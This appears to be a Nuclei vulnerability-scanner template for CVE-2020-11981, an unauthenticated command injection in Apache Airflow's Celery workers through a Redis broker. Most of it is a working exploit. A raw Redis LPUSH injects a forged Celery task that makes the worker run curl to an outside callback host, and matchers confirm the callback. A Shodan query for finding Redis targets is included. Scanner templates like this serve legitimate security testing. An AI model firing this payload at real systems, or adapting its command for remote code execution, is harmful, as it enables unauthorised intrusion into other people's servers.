id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
  metadata:
    max-request: 2
    shodan-query: product:"redis"
    verified: true
  tags: network,redis,unauth,apache,airflow,vulhub

variables:
  data: "*3\r\n$5\r\nLPUSH\r\n$7\r\ndefault\r\n$936\r\n{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'

tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r\n')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"